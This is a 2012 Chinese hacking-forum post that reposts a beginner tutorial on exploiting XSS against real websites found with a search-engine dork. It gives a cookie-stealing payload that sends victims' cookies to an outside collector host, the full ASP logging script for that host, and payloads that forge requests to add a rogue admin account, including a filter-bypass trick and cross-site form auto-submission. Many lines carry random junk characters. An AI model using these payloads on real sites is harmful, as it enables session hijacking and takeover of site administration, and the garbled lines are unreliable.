找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1950|回复: 0
打印 上一主题 下一主题

实战xss漏洞利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:08:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
前天贴吧一位朋友发了个后台XSS利用的帖子,大家就一起讨论了讨论,原帖为:
) _# u$ n% b$ O
$ }" i+ a- k2 @6 I- e, Chttp://tieba.baidu.com/f?kz=1069007239
# L3 _+ \4 [  F* q4 D; g
8 ]1 Z( k* `2 W4 N* \/ m这个帖子说的只是一个思路,不是很详细,并且说的是利用后台XSS挂马的情况,但是其实在后台挂马一般是不会牵扯到XSS的,只是一个过滤不过滤转换不转换的问题,比如很多带编辑器的后台,都是不过滤不转换在文章中的html代码的,比如eweb,你可以直接编辑发表文章的时候的html代码,这就为挂马、盗cookie提供了很多机会。4 t' X+ u% H6 g' I; s! A" W; ^4 _
. \9 l! r1 U) B1 m' @% D" L
但是,我想说的是,即使是挂马、盗cookie,也是不会使用location这种手法的,因为这样太明显了,一般都是使用普通挂马的手法的,比如iframe、JS等等。
" ~" F# g) Z9 l! ]" m! N6 p! _1 H1 n* y, B4 Q0 q
我在上边的帖子中说作者讲的不是很详细,希望出一个详细点的利用教程,于是今天又一位朋友就发了一个详细些的文章,我这里就发大博客里,让更多需要的朋友看到这篇文章。
9 X3 v+ A  H. B/ u6 T$ O% D. e9 F% T9 `' M5 M+ ^
这个文章是对XSS的一个很简单的利用,原理很简单,主要用于科普,只是想让朋友们知道,XSS并不是简单的弹个框框玩那么简单的,是有很多利用价值的,在国外,XSS已经被列为网站杀手之一,包括国内的很多大站,大家都把心思放到了防范SQL注入上,相应的对XSS的防范就很少,这也是XSS总是能成功的原因之一。
" k) Z- B& B; a" D$ i1 E( F  |$ I1 U) q! a9 q& _6 r+ O/ i
好了,废话不多说了,一起来看文章吧。
5 k7 Y& Y; a5 n+ g: D0 Z8 D0 b% G+ u
9 U( h  i( U7 l0 q-------------------------------------------------------------------& ~8 W  p% g, \
- K4 T, e1 H, V, L9 H- [
首先要找到一个有XXS的站,这里就不整什么大站了,谷歌一下inurl:'Product.asp?BigClassName',搜出来的命中率也比较高。随便找一个,先<script>alert('xxs')</script>一下。呵呵,框框出来了。  t+ H; l( h3 ^, s( m

3 V+ L% q$ s5 J" U" T$ ^; n
9 l  P  |4 H8 o3 b9 g5 B4 X
9 U0 }2 J/ C+ ]6 X再看看自己的Cookie吧,把alert里面的内容换成document.cookie就可以了,如图:
+ }0 [4 p  [& a3 D8 A1 H7 B4 A) M1 u  t% }  z/ Z+ }

0 r7 [) @1 A8 T* K- ]/ D$ V9 P% |/ N* M
这里就是要把弹出来框框里的东西收集到我们的记事本里。这里,要玩这个步骤就需要一个你自己的站点,具体思路就是
- o" n6 z; z8 `5 U5 e8 Q' y9 z- ^1:让目标访问已跨站的网址,然后这个网址执行脚本
5 v- ~3 i, J, t3 N0 Q2:然后跳转到你已经写好专门用来收集Cookie的网址
- D  s% n& w5 f- r( l8 J* U, R* q3 x- ~/ b+ I
具体实现方法:- [9 h9 ]+ S/ i
先构造语句<script>window.open('http://dlgyi.rrvv.net/cookie.asp?msg='+document.cookie)</script>
% I$ z) i7 o7 R3 b这句话意思是打开一个新的窗口,访问http://dlgyi.rrvv.net/cookie.asp这个网址,并且通过msg传递一个变量,这里的变量就是我们要收集的cookie了。
8 d& C) r6 X" [& {  W3 Y  z9 t  c& q5 e+ ~
这里需要自己写一个页面,也就是收集对方发过来cookie的页面,代码是这样的:
4 J0 Z3 x% L3 f3 V0 E& c- f
' V2 ~: t, c2 }/ L  s& Y<html>& p( ~# Z$ t: A. _# f
<title>xx</title>% D, d) c0 O* w
<body>
1 t2 b, ^* |0 P% U3 V<%
) _; d% A8 ?! `testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中' t7 s! ~% e1 k
msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值
4 z- z2 K6 k* F; Hset fs = server.CreateObject("scripting.filesystemobject")创建一个fs对象" |( _$ H6 Z/ T8 ]+ L( a
set thisfile = fs.OpenTextFile(testfile,8,True,0)
8 s5 z: c6 P2 E4 E9 }thisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie
& ?7 a$ L: y' U( S0 Zthisfile.close   //关闭
; G* S- |* W/ w5 [2 Nset fs = nothing5 Q1 o! \# x! T8 Z9 o7 G
%># t) ^! M* D; R5 W1 f, n3 `
</body>2 Q( [+ A0 @/ j  Z& q
</html>2 K# \- a9 o4 A# w

. i# |* A, n9 E0 t然后保存,放在你自己服务器上,如果有人点击构造好的XXS页面,就会自动在你网站的根目录生成一个文本:3 r) y4 t$ Y3 _8 m- V/ E9 o* e
( [# A* L4 c& A# W

- s- h2 }% z0 A9 P- d
  K0 |, M2 }' E+ z8 _8 f6 J/ u( }+ z" N1 O7 ^0 {5 |! _
拿出来看看,呵呵,Cookie到手:
' r, i7 f6 p1 H6 o4 B
& M" x- s, T+ ~! n 8 }8 @6 d/ \+ a6 g6 x! z0 z
. y, F0 e3 }, H
本文只是抛砖引玉,而且没有多大的实战价值,一来很多网站都过滤掉了+号这个字符连接符,二来稍大点的站,也不会存在如此的XXS,本文旨在给新手一个练习的向导,毕竟不可能谁一开始学习就可以RI掉大站,从小站开始练手,一起进步。话说咱也是新手O(∩_∩)O~
+ Z/ @, p' B' s5 c7 Q7 F
: W7 N1 c1 b+ Z  g1 p" ^PS:一点小提示,如果提交<script>alert('xxs')</script>网站没有反应时,不要立刻就点X。你可以鼠标右击,查看一下网站的源码,看看网站到底过滤掉了什么字符,通过编码啊神马的发挥下智慧,绕过过滤。只要出现小框框,咱就胜利了。# j' d) m  w1 K: m% C
' C& Q: |1 z! Z% d/ @4 r% W1 c
-------------------------------------------------------------------
$ {$ h6 B2 d, {6 m
% b' G' b" C# F/ [; M下面是我对这个帖子的回复,也一起贴过来吧:
8 i6 [: V4 J( y. h) i6 J3 C2 E& S# T/ q$ q; i' G2 c7 R5 {
说实话,像这种后台XSS其实作用不大的,一般的小站你拿到cookie也没什么利用价值,大点的站的话,或许可以用cookie盗点装备什么的,但那牵扯的多了,不过对于普通脚本小子来说,日站的时候除非毫无办法了还会想到XSS的,不过日站时候的XSS利用方法跟这篇文章里讲的差不多的,可以借鉴一下。& J4 H$ A) |  D- y- ^) B  U3 B; p' m
  I$ |9 k# P4 ^" T7 K2 _* e
但是,这里的文章讲的是针对已经进入后台、拿shell无望又想多获得点东西的情况,说它鸡肋的原因是,你知道的,现在大部分站都是cookie+session的,并且一般用户名和密码不会直接放到cookie里了,这是它鸡肋的原因。  ]6 F# Y& {9 M$ i7 ^5 O
再者,日站的时候盗cookie一般是想进后台,但是如果遇到网上有源码的情况的话,还可以进一步利用,比如添加个管理员什么的。% r% |$ P, Z3 s9 D* B8 ?! e

' Y( `( x0 t- J% [; z$ F在文章的最后,顺便贴上一般XSS的利用思路,也不是原创,原文链接:% b5 W; h8 l1 n# Y% [
8 }7 d. S! A! i0 X
http://user.qzone.qq.com/673116767/blog/1252452536
1 o) N8 Q" G# t! c' D; S
4 L7 r) }, O) W8 F' l/ k# r4 J一般发现一个xss漏洞后要做的基本上就是这些:
% A" I9 P& v. O% ~
8 s9 M7 m4 F. E9 p" F1.  伪造请求  使用$_REQUEST或$_GET8 N% t/ ?/ y0 y! ]+ s
+ ?& O7 c" Y& p7 w- ^" k
首先我们要找找该网站使用的程序是不是在网上能找到源码,如果能找到源码的话,就去分析后台管理员更改密码或者增加管理员的页面,然后分析管理员使用的是不是$_REQUEST接收参数,如果是的话,我们使用该XSS漏洞构造一个请求,比如前台发表留言中可以使用HTML代码,那么我们就嵌入一个IMG元素:
5 ?$ e! U: f! ?7 n+ q; w<img src="/admin/admin_add.asp?name=xxx&psd=yyy" />
8 k8 @2 @; @0 f+ o, O当管理员登录管理后台后看到包含img的页面的时候,就伪造了一个增加后台管理员的请求,而该请求是由管理员发出的,所以顺利的增加了一个新的管理员。+ T0 I  \% {$ O. `4 X' O
* |. J* [- O0 Y5 p* I" D  S' ~
如果是可视文本编辑器,可以尝试使用输入:
" f8 Q9 r7 A/ @1 x$ Vhttp://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy'); s! [( ?& M% S
这样最终会构造出:
) b3 V( ?1 W  p! E7 Q/ B<img src="http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy',0,0)" />
8 |* f$ V5 F4 }! n8 O( k! n总之要举一反三。2 n: C! A) P6 N. J* w6 Y

% P" ^/ U1 U" u( ~' f/ S. g; q9 p2. 伪造请求  使用$_POST/ b/ U) Y0 W* K; n" [  `  s. E! B
& |/ C. s+ J1 ~9 M$ i  R9 v4 F
当后台接收增加管理员或更改管理密码的变量时使用的是$_POST方式,那么第一种方法无效,我们视情况而定,如果没有过滤<script>,我们可以通过ajax方式来伪造请求,如:4 S* d1 U' Q  A( ?8 I, e# V. N2 ]
<sc/*xss*/ript type="text/javascript">
, e. k' @9 b6 avar aj = new ActiveXObject("MSXML2.XMLHTTP.3.0");7 w+ u6 _( z6 q4 a6 A- D6 F
aj.open("POST", "/admin/admin_add.asp", false);
, e: E8 G8 l  s& M: ?. p# Fvar postdata = 'name=xxx&psd=yyy';* }) O. s- J) t: r! u/ x8 T
aj.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); 0 D  b2 T6 z# _) t7 G  P
aj.send(postdata);
1 `+ o( N- H! V1 I</scr/*xss*/ipt>' M2 B% A, I- `8 a$ m% F) p
/*xss*/是HTML注释,用来绕过简单的对script代码块的过滤。
: ~, I$ x# n! C2 _! v6 W4 D- L
% f5 n* d/ |; \. J6 w" M% v3. 跨站伪造请求 使用$_GET 或 $_REQUEST
% e0 B; p7 }* i+ Y  l1 ^+ k
+ x) U8 k: l0 ?* M- h9 O与第一种伪造请求的方式相似,但是第一种伪造请求是利用站内的xss漏洞进行的,而跨站伪造请求,是站外发起的,比如我在我的博客的首页放了这样一个图片
% t, q" A/ X/ R# J- u<img src="http://www.drvfan.com/admin/admin_add.asp?user=xxx&psd=yyy"/>
* E( x% }' H6 ]2 \1 L, f/ M- Z& c然后我跑到dvbbs上发帖子,“勾引”动网论坛的管理员来我的博客,如果动网论坛的管理员已经登录了他的管理后台,然后使用共享进程的浏览器(目前基于ie内核的myie,maxton等等还有firefox都是共享进程的)来访问我的博客,那么他的后台就会被加入一个用户。
2 Q5 x2 z4 p6 L7 [5 V0 T- _$ p3 W
# V" e& Q' m  e9 x4.跨站伪造请求 使用$_POST(0day)7 r3 y/ X2 Y9 K0 X

- L- ]  p8 A' B. n# F) z如果入侵目标的管理后台使用的是$_POST方式来接受变量,那么我们无法在我们的网站跨站使用ajax的post方式提交数据过去,因为ajax是无法跨域的。
' N7 O. Y$ y. _" J5 p" U7 Y- W
, r* O7 J5 ^: K9 g7 @$ Y但是我们可以在我们的网站放一个form,里面填写好数据,form的action为要利用的有漏洞的页面,然后当有人打开该页面的时候,我们就用js控制该form进行submit,ajax虽然不能跨域,但向域之外的地址提交form总是可以的。
' @: g4 x4 y' x! u$ h  L8 f* y! }8 \, @$ S1 U* N8 x# r7 |
总之,第3,4种方法成功几率要小一些,因为我们要想办法让已经登录自身后台的管理员,使用共享session的浏览器访问我们的伪造请求的页面,有一点社会工程学的技术含量。+ ^/ V: }- j: R6 m
* ]2 _/ E) X6 s5 e3 _5 z4 d
OK,该说的都说完了,Over。
+ F! y+ p5 Z+ e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表